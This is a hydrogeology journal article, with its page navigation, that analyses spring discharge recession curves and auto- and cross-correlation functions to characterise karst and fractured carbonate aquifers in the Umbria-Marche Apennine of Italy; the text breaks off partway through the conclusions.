Next Article in Journal Recent Trends in Removal Pharmaceuticals and Personal Care Products by Electrochemical Oxidation and Combined Systems Next Article in Special Issue Coupling SKS and SWMM to Solve the Inverse Problem Based on Artificial Tracer Tests in Karstic Aquifers Previous Article in Journal Sociohydrologic Systems Thinking: An Analysis of Undergraduate Students’ Operationalization and Modeling of Coupled Human-Water Systems Previous Article in Special Issue Hydrothermal Dolomite Paleokarst Reservoir Development in Wolonghe Gasfield, Sichuan Basin, Revealed by Seismic Characterization     Font Type: Arial Georgia Verdana Font Size: Aa Aa Aa Line Spacing: Column Width: Background: Article Groundwater Circulation in Fractured and Karstic Aquifers of the Umbria-Marche Apennine Department of Pure and Applied Sciences, University of Urbino, 61029 Urbino, Italy * Author to whom correspondence should be addressed. Water 2020, 12(4), 1039; https://doi.org/10.3390/w12041039 Submission received: 4 March 2020 / Revised: 2 April 2020 / Accepted: 3 April 2020 / Published: 7 April 2020 (This article belongs to the Special Issue Recent Advances in Karstic Hydrogeology) Abstract : The Umbria-Marche Apennine has a large number of springs that drain water stored in carbonate formations. Spring groundwater constitutes a crucial freshwater resource for many countries, regions, and cities around the world. This study aimed to understand the hydrological mechanisms behind groundwater circulation and their relationship to the structural and stratigraphic settings of specific aquifers. Recession analysis and time series analysis were applied to the daily discharge of six springs monitored over eight years. Both analyses indicated the presence of two types of aquifers: aquifer with unimodal behavior and aquifer with bimodal behavior. The first are characterized by two hydrodynamic sub-regimes, in which fracture networks control the baseflow and conduit networks control the quickflow. In contrast, other springs present only one hydrodynamic sub-regime related to fracture network drainage. Time series analysis confirms the results of recession analysis, showing a large memory effect and a large response time, implying the dominance of the baseflow sub-regime. These results indicate that the Maiolica Formation is characterized by a high degree of fracturation and slight karstification, which control infiltration and percolation, whereas the Calcare Massiccio Formation regulates groundwater circulation in the deeper zones of the aquifer, characterized by a high degree of karstification through moderately developed conduit networks. 1. Introduction To construct a distributive model of groundwater circulation in a carbonate aquifer, the definition of realistic hydraulic and geometric parameters is essential [1,2,3]. Carbonate aquifers differ from other types of hydrogeological systems in their complex behavior, stemming from strong spatial heterogeneity and temporal variation [4]. This heterogeneity is linked to the hydraulic properties of the through media, such as low-permeability of rock matrix or high permeability of conduit networks, especially when karstified. However, in most cases, spring discharge time series data can be obtained and used to perform an analysis of hydrograph recession curves, which are an often-used method in the interpretation of the characteristics and flow attributes of an aquifer [5,6,7]. Some hydrograph analytical techniques are based on the analysis of slow hydrograph recession segments using the Maillet and Boussinesq equations [8,9]. Therein, deviations from the calculated exponential trends may indicate the presence of hydraulic anisotropies and, therefore, highlight the close relationship between spring hydrographs and hydro-structural geometry [10,11,12,13]. Other authors proposed characterizing the recession process by employing different mathematical functions. Drogue [14] described the whole recession process by using one single hyperbolic formula, where the recession coefficient, α, is not equivalent to the coefficient used by Maillet [9]. In contrast, Mangin [10] distinguished two processes that influence recession curves: discharge from the non-saturated zone with a non-linear flood recession and discharge from the saturated zone with a linear baseflow recession. Kovács et al. [12] showed that the recession coefficient allows for obtaining important information about aquifer hydraulic parameters and conduit network characteristics. One main advantage of recession curve analysis is that a set of empirical, quantitative parameters attributed to drainage mechanisms can be calculated [15]. Analysis of individual recession periods sometimes generates inconsistences related to the complexity of groundwater circulation and the processes acting on the system [16]. Therefore, a master recession curve (MRC) is commonly used for simultaneously analyzing a set of hydrograph recessions at a particular catchment [17,18,19,20,21,22]. Malík and Vojtková [23] performed a recession curve analysis to evaluate the karstification degree and the hydrodynamic behavior of an aquifer. With given recession coefficients and initial discharge values, both runoff and partial runoff segments (sub-regimes) can be fully described. In karst hydrogeology, the term “sub-regime” refers to the changing conditions of a groundwater system, its characteristic behavior, or the controlling of natural processes, which usually occur in a regular pattern [24]. Apart from recession analysis, univariate and bivariate analyses can also be performed on spring hydrographs. Valuable indirect information regarding karst systems can be obtained by performing a time series analysis [25]. Mangin [26] developed a specific methodology for studying the input-output relationships in karst aquifers, as well as for performing auto-correlation (univariate analysis) and cross-correlation (bivariate analysis). This methodology was based on a systemic approach and was applied and elaborated further by several authors [27,28,29,30]. In karst hydrogeology, auto-correlation functions (ACF) of spring discharge (Q) are generally used to assess the interdependence of spring discharge and evaluate the so-called “memory effect” [31], whereas the cross-correlation function (CCF) is widely used to analyze the linear relationship between input (rainfall or snowmelt, P) and output (Q). A hydrogeological study of aquifer spring provides key information for the sustainable management of water resources exploitable by different end-users (e.g., hydrogeologists, hydraulic engineers, well drillers, environmental decision-makers). The present work aims to characterize the behavior and groundwater circulation of the Umbria-Marche carbonate aquifers (northern Apennines) on a regional scale. MRCs were constructed and used (i) to define the mechanisms controlling flow path distribution within carbonate hydro-structures, (ii) to discretize the possible sub-regimes, and (iii) to define the karstification degree of each carbonate complex analyzed. The statistical methods applied to the time series gave information about the characteristics of the carbonate systems under study. Particular emphasis was given to the hydro-geological interpretation of the functions and their relationships with the structural setting in this portion of the Apennine ridge. 2. Materials and Methods 2.1. Study Area The Apenninic chain of Central Italy is a mountain range characterized by the presence of extensive outcrops of thick Mesozoic limestone sequences. The study area includes a large sector that starts at the M. Cucco anticline and terminates at the M. Pennino anticline. The outcropping geological formations are mainly composed of calcareous and marly lithotypes (from Triassic to Cretaceous in age) belonging to the Umbria-Marche Succession [32,33]. From a structural point of view, the Umbria-Marche Apennines can be considered a typical thin-skinned thrust belt in which a hierarchy of multiple, superimposed detachments occurred over a main, basal detachment at the level of Triassic evaporites that act as an aquiclude. The Apenninic arch has a vergency towards ENE [34,35] and is characterized by SW dipping thrust and by fault systems with a N-S and E-W strike. The evaporitic level is overlaid by the Mesozoic carbonatic sequence consisting of three superimposed aquifers of different permeabilities controlled mainly by fissures, joints, and karst conduits (see the hydrogeological map in Figure 1) [36,37,38,39,40,41]. Starting from the bottom, these aquifers are the basal aquifer of the Massiccio Complex, the middle aquifer of Maiolica Complex and the upper aquifer of the Scaglia Complex. The Calcare Massiccio aquifer, with a thickness ranging between 700 and 900 m, represents the most important hydrogeological complex in the Umbria-Marche limestone ridge. It is characterized by a regional flow through highly-developed fissures and karst conduits. The Maiolica aquifer is separated from the basal aquifer by a sequence (from 100 to 350 m thick) of Upper Jurassic and calcareous marls (Calcari ad Aptici, Diasprini, Posidonia, Rosso Ammonitico Fms.) that act as an aquiclude. This sequence can be substituted locally by the very thin (20–100 m) Bugarone Calcareous Fm., which transforms it into an aquitard from a hydrological point of view. The Maiolica Complex is rather thick (200–400 m) and is constituted of more limited karstification but a high degree of fracturation. This aquifer is overlain by the Marne a Fucoidi Fm., a low permeability formation that acts as a regional aquiclude [36]. Finally, the Marne a Fucoidi Fm. is overlain by the Scaglia aquifer complex, which consists of alternating limestone and marly limestone layers with chert nodules and ribbons [16]. This complex is characterized by a high fracturation degree and a significant thickness (200–400 m), which affords it high storage capacity of infiltration water. Above, the aquifer is capped by a low permeability clayey-marly-calcareous sequence (Scaglia Variegata, Scaglia Cinerea, Bisciaro and Schlier Fms), usually enclosing an independent aquifer [42]. Eighty percent of the groundwater resource of the Umbria-Marche hydrogeological domain surfaces at liner springs [36], i.e., when a stream or river is directly fed by groundwater of saturated hydrogeological system. The outcropping area of hydrogeological complexes playing an active role in groundwater recharge, thanks to their high capability of infiltration [43]. The extension of recharge area of each spring has been defined on lithological and structural geological data and compared with the literature data [44,45,46,47,48]. Recharge area of Scirca spring has been localized using multi-tracer tests from the karstic conduits [44] and correspond to specific lithological and geological structures [46]. The Vaccara, Boschetto, and Capo d’Acqua recharge areas have been calculated in the water balance of the Mountains of Gualdo [47]. Finally, the recharge area of the Bagnara spring corresponds to the outcrop of the core structure; this interpretation seems to be confirmed by the hydrochemical characteristics of the water (calcium bicarbonate with few increases of sulphates), which would indicate a fed due to the deep aquifer of Mt Pennino [48]. The area under study, about 220 km2, includes the following main reliefs: Mt. Cucco (1566 m a.s.l.), Mt. Maggio (1362 m a.s.l.), Mt. Serrasanta (1423 m a.s.l.), Mt. Penna (1432 m a.s.l.), Mt. Burella (1095 m a.s.l.), and Mt. Pennino (1572 m a.s.l.). Each relief represents a distinct hydrostructure with internal aquifer systems connected to one or more springs in their recharge areas (Table 1). 2.2. Data Acquisition The rainfall data (mm) has been collected by automated rain gauges provided by the Hydrographic Service of Umbria Region; in particular, only three rain gauge stations located within the study area were considered (Table 2) and the data were collected over eight years (from 01 January 2007 to 31 December 2015). Snowfall was recorded by only the MC station (located at 1116 m a.s.l.); therefore, the available dataset was not enough to cover the entire study area. The UM area has a typical subcontinental climate characterized by a dry and warm summer and a wet period during autumn, winter, and spring. The monthly rainfall reaches a maximum during November and a minimum in July and August. In the more elevated zones (above 1000 m a.s.l.), the precipitation can present as snow during winter (mainly in January–February), with a thickness of a few decimeters, which can have a significant effect on groundwater aquifer recharge (Figure 2). The discharge of six carbonate springs (Scirca, Vaccara, Boschetto, Capo d’Acqua, San Giovenale, and Bagnara) of the Umbria-Marche Apennines monitored by ARPA Umbria (www.arpa.umbria.it), with an acquisition time interval of one day, was analyzed. All springs treated were captured for potable purposes and were measured by eight channel electromagnetic and ultrasound systems. The monitoring systems recorded the minimum, mean, and maximum value each hour, and the dataset was computed at the end of the day and transmitted as daily mean. Figure 3 shows a subset of about eight years of the available data. Due to a lack of continuity in data recording, some gaps are present in the time series. The statistical analyses of dataset quality are presented in Table 3. 2.3. Recession Analysis Recession analysis focuses on the recession curve, which is the portion of the hydrograph immediately following a stream peak (and rainfall event), when flow diminishes. In this study, the Maillet exponential equation was used (Equation (1)) because it generates good fits for analyzing hydrograph recession curves and accurately describes recession over long time periods [12,13,49]: Q t = Q 0 × e α i t where Qt is the discharge at time t and Q0 is the discharge at time t = 0. Specifically, the modified Maillet equation was used, which can be expressed by a sum of several exponential components that represent the presence of possible sub-regimes [13,18,50,51,52]: Q t = i = 1 n Q 0 i × e α i t where i represents the media i in the aquifer, Q0i represents the discharge of media i at t = 0, and n represents the number of sub-regimes or flow components. A karst aquifer can always be divided into different sub-regimes based on the different hydraulic conductivities of the media that comprise it [52,53,54]. Therefore, the modified Maillet equation can be written as: Q t = Q q × e α q t + Q b × e α b t where Qq and Qb are the initial discharges, and αq and αb are the recession coefficients of the quickflow and baseflow, respectively. Analyzing the hydrographs of each aquifer system (Figure 3) has shown that the recession curves do not exhibit the same trends within the time series analyzed, making it impossible to use a single interpolating curve to characterize all aquifer systems. Therefore, a procedure for dividing the curve into single segments with different slopes was needed. The Master Recession Curve methodology enables one to work simultaneously with numerous recession periods, making the influence exerted by precipitation negligible and obtaining realistic parameters of each aquifer system. Hence, MRCs were calculated using the freeware software RC 4.0 of the HydroOffice [21], applying the manual method tool to create a graphical analysis and to divide curves into different segments having homogeneous trends, thereby enabling separate analysis. The conceptual model applied is that of a linear reservoir [8,9], which follows Maillet’s exponential recession function shown above. 2.4. Time-Series Analysis The ACF evaluates a time series by quantifying the linear dependency of successive values over a specified time period (lag time) [55]. It can be written as follows [28,50]: For k > 0, C ( k ) = 1 n t = 1 n k ( x t x ¯ ) ( x t + k x ¯ ) r ( k ) = C ( k ) C ( 0 ) where r(k) is the auto-correlation function, C(k) is the correlogram, k is the time lag (k = 0 to m), n is the length of the time series, xt is the value of the studied variable at time t, and m is the cutting point [56]. The cutting point determines the interval within which the analysis is conducted. The correlogram reflects the “memory effect” of a system [26,50,57,58], i.e., the time needed for the system to “forget” its initial conditions, and corresponds to the lag time required for the ACF to reach 0.2 [54,55,59]. The CCF is used to examine the dependence of output series y (discharge) on the input series x (precipitation) and can be calculated using the following equation [27]: For k > 0, C x y ( k ) = 1 n t = 1 n k ( x t x ¯ ) ( y t + k y ¯ ) r x y ( k ) = C x y ( k ) σ x σ y where k is the time lag, n is the length of the time series, xt and yt are input and output time series, respectively, rxy (k) is the cross-correlation function, σx and σy are the standard deviations of the time series, and Cxy (k) is the cross-correlogram [56]. Both of ACF and CCF analyses are performed using correlograms. A steep slope in the correlogram means a fast response of the aquifer to a rainfall event and indicates a higher karstification degree. In particular, CCF analysis can provide strong support for the identification of the main rainfall contribution and the travel time through the main infiltration pathways [60]. The results can be compared using recession coefficients estimated by hydrograph analysis. 3. Results 3.1. Discharge Time Series Description Monitoring in the field has provided the time series of daily average discharge of six springs covering about eight years, from 2007 to 2015. The hydrographs in Figure 3 show that the springs are reactive, i.e., that the discharges vary after rainfall events throughout the year. However, the response of each spring reflects the spatial distribution of permeability in each respective aquifer and their hydrogeological characteristics [61]. The amplitude of the discharge variations depends both on the size of the recharge area and on the porosity and heterogeneity characteristics of the carbonate reservoir. The Scirca spring is located in the SW limb of the Mt. Cucco anticline, at 575 m a.s.l. The spring’s catchment area is about 8 km2 and its discharge averages 214.9 l/s [44]. The time-series of the Scirca spring is rather continuous and the hydrograph passes from quick- to baseflow conditions, with the corresponding rapid decrease in water level, generally in early summer. The waters of the Vaccara spring, set at an elevation of 468 m a.s.l, drains the SW limb of Mt. Maggio. The spring has a large recharge area of 6.2 km2 and a mean discharge of about 119 l/s. The time-series is rather incomplete (24% of data is missing). The gaps in data are due to instrumental errors. The spring’s hydrograph shows a very fast response to recharge events and rather clear passages from quick- to baseflow during dry periods. The hydrograph for Boschetto spring was very similar to that of Vaccara spring, exhibiting clear differences between baseflow and quickflow regimes. This spring is located on Mt. Penna at 538 m a.s.l. and has a mean discharge of about 185 l/s, which is about 65 l/s more than the Vaccara spring. This difference can be explained by Boschetto spring’s larger recharge area (about 11.5 km2). The Capo d’Acqua spring is located on the same hydrostructure as Boschetto spring but drains the other side of the relief (NE limb of Mt. Penna). This spring has an average discharge of 94.2 l/s and does not show a clear passage from quickflow to baseflow regimes because of a significant lag in discharge response following infiltration. The estimated catchment area is about 7.4 km2. The San Giovenale spring drains the greatest amount of water of all other carbonate systems in this study, with an average discharge of 394.7 l/s. The estimated recharge area is about 10.5 km2 and the karst system shows the same behavior as the Capo d’Acqua spring. Differences between quick- and baseflow regimes are not observable and the decrease in water level is very slight and delayed. The high average discharge of the San Giovenale spring cannot be explained by the size of the recharge area. Most likely, this carbonate system is supplied by non-negligible groundwater flows from the Colfiorito plain [43]. The hydrograph of Bagnara spring shows characteristics intermediate between those of the Scirca, Vaccara and Boschetto springs, and those of the San Giovenale and Capo d’Acqua springs. This karst aquifer shows a fast response to infiltration in a quickflow regime and a slight decrease in discharge during the baseflow regime. This behavior indicates a very marked spatial heterogeneity in porosity along the aquifer. Thus, the Scirca, Vaccara, Boschetto, and Bagnara springs show a quick response to a rainfall event characterized by steep peaks followed by rapid decreases in water level. This behavior is characteristic of all karst systems with a well-developed network of fractures and conduits. The San Giovenale and Capo d’Acqua springs, on the other hand, show a delayed response to rainfall events, with a slow decrease in discharge over time. This behavior is typical of a poorly-developed karst systems, where groundwater circulation occurs through the matrix and fracture networks. 3.2. MRCs Analysis Recession curve analysis was performed on hydrographs from six aquifer springs located in the Umbria-Marche Apennines. Different shapes of a spring’s recession curve are attributable to drainage from different components of the groundwater system, reflecting karstification degree [15]. The karstification of soluble rock can be considered the most important geological phenomenon influencing the hydraulic behavior of carbonate aquifers. The presence of different lithologies in the catchment area can highlight these hydraulic differences [62]. The Master Recession Curve methodology was used to work simultaneously with numerous recession periods (Figure 4), making the influence exerted by precipitation negligible and allowing to obtain an average value representative of the entire recharge area [16]. Changes in the slope of the recession curve have been attributed to aquifer heterogeneity [63,64], whereas recession curves that can be expressed by one exponent represent homogeneous conductivity and storage properties. The discharge of the aquifer can be considered approximately constant and specific for each aquifer-spring system when the changes of hydraulic conditions (transmissivity, water table area) are not appreciable during the emptying associate with the recession limb of the hydrograph [65]. Therefore, recession analysis using the MRC methodology has allowed to identify two groups with different hydraulic behavior: aquifers with unimodal behavior (having one sub-regime) and aquifers with bimodal behavior (having two sub-regimes). All the aquifer springs analyzed have a good fit with the exponential equation of Maillet [9], indicating that the more appropriate conceptual model is that of a linear reservoir [8,9]. A recession curve analysis was conducted on records from eight years, resulting in about seven intervals (individual recessional discharge sets). These partial recession curve records were assembled to create a master recession curve of each spring (Figure 4 and Figure 5). Table 4 and Table 5 present the recession coefficients, discharge range, duration of sub-regime of measured recession curves, and the number of assembled individual recessional discharge successions used to create an MRC of each spring. For the Scirca, Vaccara, Boschetto, and Bagnara springs, the results showed a significant degree of curve separation in two segments, characterized by different recession constants (Figure 4). Indeed, the values of the recession coefficients of quickflow sub-regimes (αq) are rather high, ranging from 0.015 d−1 (Bagnara spring) to 0.1 d−1 (Boschetto spring). This may be caused by the change of hydraulic or geometric characteristics of the aquifer during the depletion process [65]. According to Amit et al. [11], the exponential term with the largest slope represents a rapid depletion of flow channels with the highest hydraulic conductivity. The transition from quickflow to baseflow occurs after 150 and 180 days in the Scirca and Bagnara (Figure 4a,d) springs, indicating that fast drainage is the dominant component for most of the years. In contrast, the baseflow sub-regime is the dominant component of Vaccara and Boschetto springs, with a sub-regime transition occurring after about 30 and 50 days in Boschetto and Vaccara springs (Figure 4b,c), respectively. The parameters of these springs reflect the structural properties of their aquifers, such as karstification degree, fracture networks, and conduit networks. The Capo d’Acqua and San Giovenale springs present a unimodal behavior because their MRCs can be expressed by one exponent (Figure 5). This means that their aquifer systems are characterized by homogeneous conductivity and storage properties. However, these two springs differ in their recession coefficients. Capo d’Acqua spring has a recession coefficient of 0.0074 d−1, a value with the same order of magnitude as baseflow recession coefficients of the previously described springs with bimodal behavior. An exponential term with a small slope corresponds to slow depletion of a flow network with low hydraulic conductivity [11]. The recession coefficient of San Giovenale spring (0.0115 d−1), on the other hand, is very similar to quickflow components of aquifer springs with bimodal behavior. The recession period estimated by the MRC method is 200 days for both carbonate systems (Table 6). The difference between the two aquifers is in their dominant components (quickflow vs. baseflow sub-regimes). Capo d’Acqua spring is dominated by a baseflow sub-regime, where drainage is controlled by matrix and fracture network porosity, while San Giovenale spring has a quickflow-dominated sub-regime, characterized by a fast drop in water level controlled by fracture and conduit networks. 3.3. Time-Series Analysis: Autocorrelation and Cross-Correlation 3.3.1. Autocorrelation Function (ACF) The autocorrelation function treatment quantifies the linear dependency of successive values over a specific time period and reflects the memory of the system [61]. The values estimated using this method are shown in Table 6. The daily time series correlograms for each spring are shown in Figure 6. The correlogram of the Scirca spring shows a rapid and regular ACF slope that reaches rk = 0.2 after 80 days. The shape of the autocorrelation functions and the high memory effect implies a significant storage capacity, probably linked to a well-developed fracture network. The ACF of the Vaccara spring further confirms its bimodal behavior. First, it displays a rapid decrease in the first days (10 days), comportment associated with a quickflow sub-regime; then, its slope levels out, reaching rk = 0.2 at a much slower rate after 90 days, a response characteristic of a baseflow sub-regime. In the case of the Boschetto spring, the decrease in the autocorrelation function is uneven and marked by two discrete components. The first drops quickly, within about 20 days, while the second decreases more slowly and reaches rk = 0.2 at 89 days, indicating a strong duality of these karst systems. The Bagnara spring shows a very slight decrease in ACF with no steps. The estimated memory effect is high, with a value of about 121 days, indicating a higher storage capacity and high filtration potential of this aquifer systems. The correlogram of Capo d’Acqua spring discharge displays a regular decrease in the slope of the ACF, reaching rk = 0.2 with the same time lag as the other systems seen thus far (90 days). This suggests the prevalence of the baseflow component, probably due to a fractured matrix. The ACF for the flow rates at San Giovenale spring diminishes very slowly when the time lag increases. This karst system shows a memory effect of 150 days, presenting great inertia and indicating that the aquifer has a large storage capacity, which is drained very slowly. 3.3.2. Cross-Correlation Function (CCF) The delays between inputs and outputs of various springs are useful information in the regional study of a carbonate aquifer because they give an estimate of the variation in pressure pulse transfer times and of particle travel times through the aquifer [29]. The delays are also significant in the modeling of the aquifer and indicate the karstification degree of a karst system. The wet and dry periods, which induce high and low flow periods in the spring discharge series, appear more difficult to define in the rainfall time-series [66]. The lowest values of the rainfall cause the most intense droughts in the spring discharge series, as shown for example by the period included between June 2011 and March 2012. Rainfall data of different rain gauge stations were used in relation to correspondent hydrostructure and proximity to them. Therefore, the MC station has been used for the Scirca spring, the GT station has been used for the Vaccara, Boschetto, and Capo d’Acqua springs, and the NU station has been used for the San Giovenale and Bagnara springs. The CCFs between the rainfall and discharge time series of each spring are shown in Figure 7, while the relative parameters (maximum cross-correlation coefficients and their related time lag) of the time-series analysis are listed in Table 6. The cross-correlograms show rather low rxy(k) values (between 0.18 to 0.27). This indicates that the precipitation signal is significantly reduced between its entry into the system and the time when it reaches the water table via the unsaturated zone [29]. Cross-correlograms of the Boschetto, Scirca, and Vaccara springs are each characterized by a sharp peak (0.27, 0.24, and 0.18, respectively) that diminishes rather rapidly in the first days, reflecting a short response time (2 days for Boschetto and Vaccara springs and 13 days for Scirca spring). Subsequently, the CCFs gradually decrease with a gentle slope for about 50 days. This shape indicates the duality of the aquifers, with the sharp peaks indicating a transmissive function and the slight decreases indicating a capacitive function [61]. Cross-correlation functions of the Capo d’Acqua, San Giovenale and Bagnara springs show much more regular unimodal trends than the previously described springs. In fact, CCFs decrease rather slowly with a gentle slope. They have barely perceptible mean response delays, with cross-correlation coefficients ranging between 0.18 to 0.20. This behavior corresponds to that of a barely karstified system, similar to a porous medium in which there is no quickflow. The response times of these carbonate systems are 39 days for the Bagnara spring, 74 days for the Capo d’Acqua spring, and 119 days for the San Giovenale spring. These results indicate a gradual emptying of the hydric system with a large storage capacity that regulates the input flow (baseflow sub-regime). Finally, in the CCFs of both the Boschetto and Bagnara springs, a series of peaks were observed after the initial peak (64, 142, and 201 days for the Boschetto spring, 68, 145, and 232 days for the Bagnara spring). It appears that these may have been caused by one or more additional flow components within the aquifers. An explanation for this behavior must be sought in the slight control exercised by the system on the input function. Moreover, further limitations in the rainfall-discharge relationship exist, since spring discharge can depend on the rainfall of the previous year [60]. 4. Discussion The recession coefficient is one of the most important parameters for understanding aquifer characteristics. In this study, the Master Recession Curve method was applied to recession periods that are mainly controlled by the rate of decline in the water table [67]. Different recession coefficients reflect flow regimes with different hydraulic conductivities [5]. Therefore, the recession coefficient is always used to identify the structural properties (matrix, fractures, and conduit networks) and the karstification degree of a karst aquifer [23,52,53,54,68,69]. Applying the MRC method to the six springs allowed to define two main structural types of the karst systems in question (aquifer heterogeneity): systems with a unimodal behavior (characterized by a single flow component, αb) and systems with a bimodal behavior (characterized by two flow components, αq and αb). The number of flow phases depends mainly on the degree of karstification [70]. The recession analysis (illustrated in the equation in Figure 8) exposed different groups of aquifer systems. Bimodal aquifers have mean recession coefficient values during the quickflow sub-regime of about an order of magnitude higher than recession coefficients estimated during baseflow conditions. The MRCs displayed values between 5.3 × 10−3b of Vaccara spring) and 0.1 day−1q of Boschetto spring). This is in agreement with Mangin [10] and Amit et al. [11] and confirms the presence of two types of flow (fast and slow), as verified by the two main slopes exhibited by the recession curves. The exponential term with the largest slope, αq, represents a fast depletion (quickflow sub-regime) of flow channels with high transfer capacity, while the largest α-value likely reflects extensive fracturing and intrakarst connectivity [11]. The Capo d’Acqua and San Giovenale springs (unimodal aquifer systems) present only one type of flow, which, however, have very different magnitudes. In fact, the Capo d’Acqua spring was characterized by an exponential term with a small slope, about 7.4 × 10−3 day−1 (analogous to bimodal aquifers during baseflow conditions), whereas the San Giovenale spring showed a depletion coefficient of 1.15 × 10−2 day−1, which is the lowest value, but bears the same magnitude as bimodal aquifers under a quickflow sub-regime. Therefore, the drainage of the Capo d’Acqua spring occurs as a diffusive flow in low hydraulic conductivity conditions, most likely controlled by a dense fracture network in the rock matrix. In contrast, the discharge of the San Giovenale spring occurs in intermediate flow conditions (diffusive-turbulent) through a well-developed fracture network with the possible presence of karst conduits of a limited extent. The analysis emphasizes the role played by the structural geological setting, revealing a net demarcation of the dominantly calcareous cores of anticlines, surrounded by the impermeable Marne a Fucoidi belt and containing variably extensive basal aquifers in line with Mastrorillo and Pettita [71]. A summary of the equations describing discharge and the relative karstification degree estimated using a 10-degree scale in accordance with Malìk and Vojtková [23] for the six analyzed springs is shown in Table 7. The Boschetto and Bagnara springs showed a karstification degree of 4.0, a value only slightly higher than those of the Scirca and Vaccara springs, both of which showed a karstification degree of 3.7. These aquifer springs are characterized by aquifers with irregularly developed fissure networks dominated by open micro-fissures, which are probably associated with shallow infiltration zones (upper portion of the aquifer) mainly characterized by drainage of the Maiolica Complex. In addition, the presence of karst conduits of a limited extention in the basal portion of the aquifer linked to drainage of the Massiccio Complex, where karstic processes are very common, is very likely. In extreme cases, even short-term turbulent flow might occur in this type of rock environment. From a geological point of view, these aquifers are characterized by a hydraulic connection between the Massiccio Complex and the overlying Maiolica Complex (Figure 8). Moreover, in the Mt Pennino hydrostructures, the hydraulic continuity between Scaglia aquifer complex and the below basal aquifer is not excluded [48]. The Capo d’Acqua and San Giovenale springs showed a single exponential flow component with values of recession coefficients (α > 0.007) associated with a karstification degree of 2.3 (much lower than carbonate aquifers with the duality of discharge). Malík and Vojtková [23] described the karst systems with this karstification degree as characterized by a recharge area with tectonic faults filled with crushed material with higher permeability and lower buffering capability in relation to discharge. As shown in Figure 7, the water discharged by the Capo d’Acqua and San Giovenale springs is drained only by the Maiolica Complex. These aquifers are confined below by an aquiclude of Upper Jurassic and calcareous marls. The Maiolica complex, as well as the basal aquifer, can be characterized as a less developed karst network. Additionally, the Capo d’Acqua and San Giovenale systems are characterized by shallow aquifers, where drainage is controlled almost exclusively by fracture networks. Hence, in terms of regional hydrogeology, the Umbria-Marche carbonate domain generally has deeper groundwater flowing through hydrogeological complexes consisting of the Calcare Massiccio, Corniola, and Maiolica formations [72]. Furthermore, the structural, geological, and geomorphological conditions have favored the emplacement of a drainage network transversal to the axes of the carbonate ridges [73]. Employing the daily time series data of each spring, an interpretation of auto-correlation and cross-correlation functions proved to be a valuable tool in the study of these aquifer systems, although individual analysis has not shown the same results, because the two hydrodynamic systems (bimodal and unimodal) were not recognized in some cases. The auto-correlation functions (Figure 6) display regular correlogram curves in most cases. Only the Vaccara and Boschetto springs present sharp drop offs in their ACFs in the first 10–20 days, followed by components with much gentler slopes, with a decorrelation time of about 90 days. This confirms the bimodal behavior in the springs indicated by recession analysis. Such behavior points to the existence of an appreciable quickflow component in the initial days, linked to karst conduits that quickly drain the aquifer after a rainfall event, and a dominant baseflow sub-regime in the later days, controlled by the emptying of fracture networks. This complex and heterogeneous framework suggests that, when a rainfall event occurs, rainwater reaches the springs through different flowpaths in both unsaturated and saturated zones. Once rainwater reaches the saturated zones, the hydraulic head raises instantaneously and causes a rapid discharge increase [74]. In contrast, univariate analysis of the Scirca and Bagnara springs does not reflect the duality of aquifer systems indicated by recession analysis. The auto-correlation functions show regular, very gentle slopes with a decorrelation time of 80 days for the Scirca spring and 121 days for the Bagnara spring. The memory effect is therefore rather high for both systems, in which the baseflow component should dominate [75]. The explanation for this is probably that the karst features are mainly located in the unsaturated zone [44]. The correlograms of the San Giovenale and Capo d’Acqua springs, on the other hand, are in agreement with the recession analysis, presenting one flow hydrodynamic component (unimodal behavior). The time lag of the Capo d’Acqua spring has a similar value to those seen thus far, about 90 days. Considering the small recharge area and the limited thickness of the Capo d’Acqua aquifer, the aquifer system is characterized only by a flow component under baseflow conditions and is associated with a low karstification degree. The auto-correlation function of the San Giovenale spring presents the highest memory effect of all aquifer systems analyzed, reaching rk = 0.2 after about 150 days. This great inertia indicates a low karstification degree and, consequently, the large storage capacity of the system. From a hydrogeological point of view, the aquifer is characterized by a large recharge area (10.5 km2) and a rather limited thickness (Figure 7d), due to drainage that occurs only into the Maiolica complex. The analysis of cross-correlation functions produced approximately the same results as those of recession analysis, and partially the same as those of the auto-correlation analysis, although the coefficients estimated between spring discharges and rainfall events were rather low (0.18–0.27). In fact, the CCFs of Scirca, Vaccara, and Boschetto springs indicated a bimodal character, showing a discrete peak with a delay of a few days. This can be interpreted as a rapid response of the aquifer to a rainfall occurrence. In contrast, the CCFs of the Capo d’Acqua, San Giovenale, and Bagnara springs show a long impulsional response, which exceeds 200 days, with a rather high delay ranging from 39 days (Bagnara spring) to 119 days (San Giovenale spring). This indicates a powerful memory of the systems and the dominance of baseflow at the expense of quickflow. 5. Conclusions In order to define the characteristics of groundwater circulation in carbonate hydrostructures of the Umbria-Marche Apennine, the discharge time-series from 1 January of 2007 to 31 December of 2015 (eight years) of six aquifer springs were analyzed, using different methodologies (MRC “master recession curve” analysis, ACF “auto-correlation function” analysis, and CCF “cross-correlation analysis”). The carbonate aquifers analyzed simulated drainage under linear reservoir conditions, where discharge followed the exponential form of the modified Maillet equation, although not all systems showed the same structural properties. In fact, two types of aquifers were observed: a carbonate aquifer with bimodal behavior and a carbonate aquifer with unimodal functionality. These substantial differences can be attributed to the different structural and geological settings of individual hydrostructures, which control the different components of groundwater systems [5]. In the hydrostructures, springs represent the “spill-over” of the deep regional flow. The recharge areas of springs and deep flow are separated by dynamic groundwater divides, which move horizontally as the water table falls or rises [76]. Specifically, the discharges of the Scirca, Vaccara, Boschetto, and Bagnara springs were characterized by two hydrodynamic sub-regimes (bimodal behavior), where the fracture networks and micro-fissures (rock matrix) controlled the slow drainage (baseflow sub-regime) with an αb of about 10−3, and the conduit networks controlled the fast drainage (quickflow sub-regime) with an αq of one order of magnitude lower than that of the matrix. This reflects the karstification degree (3.7–4, according to the classification of Malík and Vojtková [23]), where conduit networks of limited extent were characterized by rare interconnected systems and surrounded by a fractured rock mass with irregularly developed and moderately opened fissures. These carbonate aquifers were defined by the hydrostratigraphic contact between the Maiolica Complex and the Massiccio Complex. The Capo d’Acqua and San Giovenale springs, on the other hand, presented unimodal behavior, showing a single exponential flow component with values of recession coefficients lower than other, previously seen aquifer systems. This is explained by groundwater circulation that happens only within the Maiolica complex, where the karst is scarcely developed, and water moves through fracture networks [77]. When the recession coefficient increased with time, a more rapid decrease of discharge was found and little available water could be supplied. This is what happened during the quickflow components of the aquifer with bimodal behavior (Scirca, Vaccara, Boschetto, and Bagnara springs). In contrast, when the recession coefficient decreased continuously with time, the decrease of the discharge was slower than the exponential recession, and the aquifer provided more available water during long dry periods [78]. This is represented by the aquifer with unimodal behavior (San Giovenale and Capo d’Acqua spring) and by a baseflow component of the aquifer with 